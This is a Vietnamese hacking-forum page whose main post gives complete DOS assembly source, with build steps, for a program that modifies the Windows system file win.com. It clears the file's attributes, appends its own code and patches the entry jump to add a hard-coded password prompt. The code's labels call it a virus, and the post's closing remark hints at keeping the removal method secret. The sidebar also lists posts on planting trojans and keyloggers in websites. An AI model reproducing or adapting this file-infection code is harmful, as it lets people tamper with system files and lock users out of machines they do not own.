Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Thu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Thu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Mon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Tue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Tue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
Fri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
Fri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
Thu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
Tue Apr 10, 2012 1:14 am by Admin

Shopmotion


Affiliates
free forum


Viết Password cho Windows

Go down

Viết Password cho Windows

Post  Admin on Sun May 22, 2011 10:42 pm

;Chương trình cài đặt password cho Windows bằng cách viết thêm code vào win.com.
;Version này còn đơn giản vì ta chỉ cài pass 1 cách cố định, nếu muốn đổi pass ta phải
;dịch lại. Bạn có thể viết thêm phần đổi pass....
;Bắt đầu

.model tiny
.code
org 100h

open_file:
mov ax, 3D02h ; AL=2 doc/ghi
lea dx,filename
int 21h

mov handle,ax

clear_attrib:
mov ax, 4301h
xor cx, cx ; xoa het moi thuoc tinh
lea dx,filename
int 21h

save_3_bytes:
mov ax, 4200h ; 00=dua con tro
mov bx,handle ; ve dau file
xor cx, cx
xor dx, dx
int 21h

mov ah, 3Fh ;Doc 3 byte
mov cx, 3
lea dx, _3_bytes
int 21h

goto_eof:
mov ax, 4202h ; 02=Cuoi file
mov bx,handle
xor cx, cx ; Do doi la 0
xor dx, dx
int 21h ; ax = dung luong file

save_jmp_displacement:
sub ax, 3
mov [jmp_disp], ax

write_code:
mov ah, 40h
mov cx, virus_length
lea dx,mywork
int 21h

goto_bof:
mov ax, 4200h
xor cx, cx
xor dx, dx
int 21h

write_jmp: ; Viet lenh nhay
mov ah, 40h
mov cx, 3 ; Den Virus
lea dx, jmp_code
int 21h

close_file:
mov ah, 3eh
int 21h
jmp exit

mywork: call next
next:
pop bp
sub bp,offset next
next1:
mov ax,0600h ;Xoa ca man hinh
xor cx,cx ;Goc trai (0,0)
mov dx,184fh ;Goc phai (18h,4fh)
mov bh,1 ;Nen den chu xanh
int 10h

mov ax,0600h
mov cx,0c32h
mov dx,0c37h
mov bh,68
int 10h

mov ah,02h ;Ham dat vi tri con tro
xor bh,bh ;trang 0
mov dx,0c20h ;(0ch,20h)
int 10h

mov ah,9 ;Hien thi chuoi
lea dx,[bp+mes]
int 21h

mov ah,0ah ;Nhap chuoi
lea dx,[bp+buf]
int 21h

lea di,[bp+check] ;Chep chuoi buf vao check
lea si,[bp+buf]
add si,2 ;Vi tri that su cua chuoi
cld
mov cx,4
rep movsb

lea di,[bp+check] ;So sanh 2 chuoi
lea si,[bp+pass]
cmpsb
cmpsb
cmpsb
cmpsb
jne b1

restore_3_bytes: ; in memory
lea si,[bp+ _3_bytes]
mov di, 100h
cld ; auto-inc si, di
mov cx, 3
rep movsb

mov di, 100h ; tra dieu khien ve chuong trinh
jmp di
b1:

mov bx,bp
lea dx,next1
add bx,dx
jmp bx

mes db 'Nhap vao mat khau:$'
check db 4 dup (0),'$'
buf db 5,5 dup (0)
_3_bytes db 0, 0, 0
pass db 'kham'
virend:
virus_length equ offset virend - offset mywork

exit:
mov ax, 4c00h
int 21h

;-------- Variable Declarations --------
filename db 'c:windowswin.com',0
jmp_code db 0E9h
jmp_disp dw 0
handle dw 0
end open_file

;Kết thúc
;Nếu không muốn cài pass nữa chỉ cần chép đè file win.com khác lên.
;Nên trước khi chạy chương trình bạn nên lưu lại file win.com để sau này còn dùng.
;Cuối cùng, tuy cách vô hiệu hoá chương trình này thật đơn giản, nhưng tôi không nói
;bạn không nói thì....có trời mới biết !!!
;#Ghi chú (dành cho những bạn chưa từng biết Assembly)
;Mở một chương trình soạn thảo văn bản (như notepad), copy phần giữa "Bắt đầu" và "Kết thúc"
;save lại với format *.asm, dùng tasm hay masm để dịch ra file .com ---->chạy file đó.
avatar
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

View user profile http://hackis.forumvi.com

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum